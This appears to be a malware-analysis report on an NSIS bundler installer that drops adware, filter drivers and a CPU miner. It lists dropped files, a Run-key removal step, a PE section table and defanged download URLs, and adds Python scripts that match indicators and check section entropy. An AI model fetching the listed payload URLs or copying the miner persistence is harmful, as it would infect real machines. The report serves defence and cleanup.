%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
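The removal steps above cover one persistence value; a responder usually also wants to sweep other hosts for the rest of what this report records. The script below is an added example, not part of the Lavasoft report: it takes the indicators listed on this page (the Run value, the two filter drivers dropped under System32\drivers, the XTab, GOSafer and CashReminder install directories, two installer drops in %TEMP%, and the distribution and tracking hosts from the URL table) and matches them against Sysmon-style events. The host set is a selection from the URL table that leaves out the OCSP, CRL, Windows Update, Mozilla and Google traffic, which is legitimate side traffic rather than an indicator. The event records are constructed for the demonstration, and the field names (`type`, `key`, `name`, `data`, `path`, `query`) are an assumed, simplified event schema.

```python
import re

# --- Indicators from the report (paths kept in the report's placeholder form) ---
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUES = {"cpuminer": r"C:\Windows\system32\cpuminer-gw64.exe"}
DROPPED_DRIVERS = [r"C:\Windows\System32\drivers\gosaferdrv.sys",
                   r"C:\Windows\System32\drivers\crfilterdrv.sys"]
INSTALL_DIRS = [r"%Program Files% (x86)\XTab", r"%Program Files% (x86)\GOSafer",
                r"%Program Files% (x86)\CashReminder"]
TEMP_DROPS = [r'C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe',
              r'C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe']
HOSTS = {"4threquest.me", "beyabir.com", "xingcloud.com", "plainsavingscenter.com",
         "brsoftwarellc.com", "gosaferllc.com", "ninjasoftwarellc.com", "related.deals",
         "amoninst.com", "ejpkwz.cc", "very911.com", "theviilage.com", "loadmoney.ru"}


def normalise(path):
    """Lower-case a real path and map the user-profile and Program Files prefixes
    onto the report's placeholders, so the report's strings compare directly."""
    p = path.lower()
    p = re.sub(r"^c:\\users\\[^\\]+\\", r'c:\\users\\"%currentusername%"\\', p)
    p = re.sub(r"^c:\\program files( \(x86\))?\\", r"%program files% (x86)\\", p)
    return p


def host_matches(query):
    """True if the queried name is one of the listed hosts or a subdomain of one."""
    q = query.lower().rstrip(".")
    return any(q == h or q.endswith("." + h) for h in HOSTS)


def match_event(ev):
    """Return the list of indicator hits for one event dict; empty if clean."""
    hits = []
    t = ev["type"]
    if t == "RegistryValueSet":
        if ev["key"].lower() == RUN_KEY.lower():
            want = RUN_VALUES.get(ev["name"].lower())
            if want and ev["data"].lower() == want.lower():
                hits.append("run-key persistence: " + ev["name"])
    elif t in ("FileCreate", "DriverLoad"):
        p = normalise(ev["path"])
        if p in (d.lower() for d in DROPPED_DRIVERS):
            hits.append("dropped filter driver: " + ev["path"])
        if any(p.startswith(d.lower() + "\\") for d in INSTALL_DIRS):
            hits.append("known install directory: " + ev["path"])
        if p in (d.lower() for d in TEMP_DROPS):
            hits.append("dropped installer: " + ev["path"])
    elif t == "DnsQuery" and host_matches(ev["query"]):
        hits.append("distribution/tracking host: " + ev["query"])
    return hits


# Constructed sample events (assumed schema; not telemetry from the report).
SAMPLE_EVENTS = [
    {"type": "RegistryValueSet", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "cpuminer", "data": r"C:\Windows\system32\cpuminer-gw64.exe"},
    {"type": "DriverLoad", "path": r"C:\Windows\System32\drivers\crfilterdrv.sys"},
    {"type": "FileCreate", "path": r"C:\Program Files (x86)\XTab\ProtectService.exe"},
    {"type": "FileCreate", "path": r"C:\Users\alice\AppData\Local\Temp\ICReinstall_310714_is.exe"},
    {"type": "DnsQuery", "query": "rp.beyabir.com"},
    {"type": "DnsQuery", "query": "ctldl.windowsupdate.com"},            # legitimate, must not match
    {"type": "FileCreate", "path": r"C:\Program Files (x86)\Notepad++\notepad++.exe"},  # clean
]


def scan(events):
    """Map event index -> hits, keeping only the events that matched something."""
    return {i: h for i, ev in enumerate(events) if (h := match_event(ev))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits)
```

Matching on the Run value checks both the value name and its data, because a legitimate miner install could reuse the name; the driver and installer paths are compared whole, while the install directories are prefix matches so any file under them counts. Hosts are matched by suffix so that rp.beyabir.com, img.beyabir.com and the like all resolve to the one listed domain.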
Static Analysis
VersionInfo
Company Name: g3CvT78vSMa0N0LPai7QvtmUwmghB
Product Name: g3CvT78vSMa0N0LPai7QvtmUw
Product Version:
Legal Copyright:
Legal Trademarks: g3CvT78vSMa0N0LP
Original Filename:
Internal Name:
File Version: 5.9.1.7
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 3128 | 3584 | 2.77203 | 7eed741492caf0627f19fc4adb8750fe |
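Two things in the section table are worth reading off before any dynamic analysis. The `.ndata` section has a raw size of 0 and the MD5 d41d8cd98f00b204e9800998ecf8427e, which is the MD5 of zero bytes; an uninitialised `.ndata` section is the hallmark of an NSIS installer stub, consistent with the NSIS plugin DLLs (System.dll, inetc.dll, nsExec.dll, nsJSON.dll, SimpleSC.dll) that were dropped into nsXXXX.tmp folders under %TEMP% above. And every section entropy is below 4.5 bits per byte, well under the roughly 7 bits per byte that packed or encrypted sections show, so the code itself is not compressed; what the installer carries is in its NSIS payload, not in the PE sections. The script below is an added example, not part of the report: it embeds the table above, applies those two heuristics, and includes the Shannon entropy routine that the Entropy column is computed with.

```python
import math
from collections import Counter

# The section table from the report: (name, virtual address, virtual size, raw size, entropy).
SECTIONS = [
    (".text",  4096,   23130,  23552, 4.44841),
    (".rdata", 28672,  4496,   4608,  3.59163),
    (".data",  36864,  110488, 1024,  3.26405),
    (".ndata", 147456, 40960,  0,     0.0),
    (".rsrc",  188416, 3128,   3584,  2.77203),
]


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_findings(sections, packed_threshold=7.0):
    """Flag sections with no raw data, a virtual size far above the raw size,
    or an entropy high enough to suggest packed or encrypted content."""
    findings = []
    for name, _va, vsize, rsize, ent in sections:
        if rsize == 0 and vsize > 0:
            findings.append(f"{name}: no raw data ({vsize} bytes reserved at runtime)")
        elif vsize > 8 * rsize:
            findings.append(f"{name}: virtual size {vsize} is >8x raw size {rsize}")
        if ent >= packed_threshold:
            findings.append(f"{name}: entropy {ent:.2f} suggests packed/encrypted data")
    return findings


def looks_like_nsis(sections):
    """NSIS installer stubs carry an uninitialised '.ndata' section (raw size 0)."""
    return any(n == ".ndata" and r == 0 for n, _, _, r, _ in sections)


def max_entropy(sections):
    return max(e for *_, e in sections)


if __name__ == "__main__":
    print("NSIS stub:", looks_like_nsis(SECTIONS))
    print("max section entropy:", max_entropy(SECTIONS))
    for f in section_findings(SECTIONS):
        print(f)
```

On a real sample the same checks run over the sections returned by a PE parser, feeding each section's raw bytes to `shannon_entropy` rather than taking the value from a report.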
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://4threquest.me/310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://4threquest.me/310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://goo.gl/Bw14Po | |
hxxp://4threquest.me/310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt | |
hxxp://4threquest.me/registro/310113f8.htm | |
hxxp://rp.beyabir.com/?pcrc=236440515&v=2.0 | |
hxxp://4threquest.me/registro/icone_cadeado.gif | |
hxxp://4threquest.me/registro/carregando.gif | |
hxxp://4threquest.me/registro/top-line.gif | |
hxxp://4threquest.me/8Hk4o | |
hxxp://info.beyabir.com/?v=1.03&c=04dec24f&at=620310157&cntr=0 | |
hxxp://4threquest.me/010914s/010914i.htm | |
hxxp://mobimidia.com/mobile/MobiMidia_validation.js | |
hxxp://4threquest.me/010914s/verificar_ip.php | |
hxxp://rp.beyabir.com/?pcrc=1901405883&v=2.0 | |
hxxp://4threquest.me/010914s/contabilizar.php?id=230313 | |
hxxp://t1.extreme-dm.com/i.gif | |
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://www.4threquest.me/registro/310113f8.htm | |
hxxp://os.beyabir.com/YBRInternet/?v=5.0&c=1840466908 | |
hxxp://4threquest.me/ids/id230313/stats_confirma.htm | |
hxxp://desprotetordelinks.me/ironsrc_prot.png?nocache=1 | |
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= | |
hxxp://mobimidia.com/mobile/mt-core.js | |
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://rp.beyabir.com/?pcrc=718955205&v=2.0 | |
hxxp://rp.beyabir.com/?pcrc=497235937&v=2.0 | |
hxxp://rp.beyabir.com/?pcrc=629602451&v=2.0 | |
hxxp://img.beyabir.com/img/Global/declineBG.png | |
hxxp://img.beyabir.com/img/Global/Yes_Button.png | |
hxxp://rp.beyabir.com/?pcrc=688063635&v=2.0 | |
hxxp://loadmoney.ru/get_info?pid=7718 | 148.251.75.52 |
hxxp://img.beyabir.com/img/Global/Yes_Button_Hover.png | |
hxxp://4threquest.me/desprotetor_setup.exe | |
hxxp://img.beyabir.com/img/Global/No_Button.png | |
hxxp://img.beyabir.com/img/Global/No_Button_Hover.png | |
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://img.beyabir.com/img/Sihehihi/Sihehihi_31_03_15.png | |
hxxp://img.beyabir.com/img/Rerarapepe/logo.png | |
hxxp://img.beyabir.com/img/Rerarapepe/logo_new.png | |
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe3.jpg | |
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe.png | |
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe_b.png | |
hxxp://img.beyabir.com/img/Rerarapepe/RerarapepeV2_BG4.jpg | |
hxxp://4threquest.me/310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://img.beyabir.com/ofr/isicicc2.7.cis | |
hxxp://4threquest.me/310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt | |
hxxp://4threquest.me/150814s/150814c.htm | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en | |
hxxp://54.171.12.129/SL2 | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/cpuminer-x11opt-setup.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php | |
hxxp://www.ejpkwz.cc/3517/1 | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php | |
hxxp://www.ejpkwz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip | |
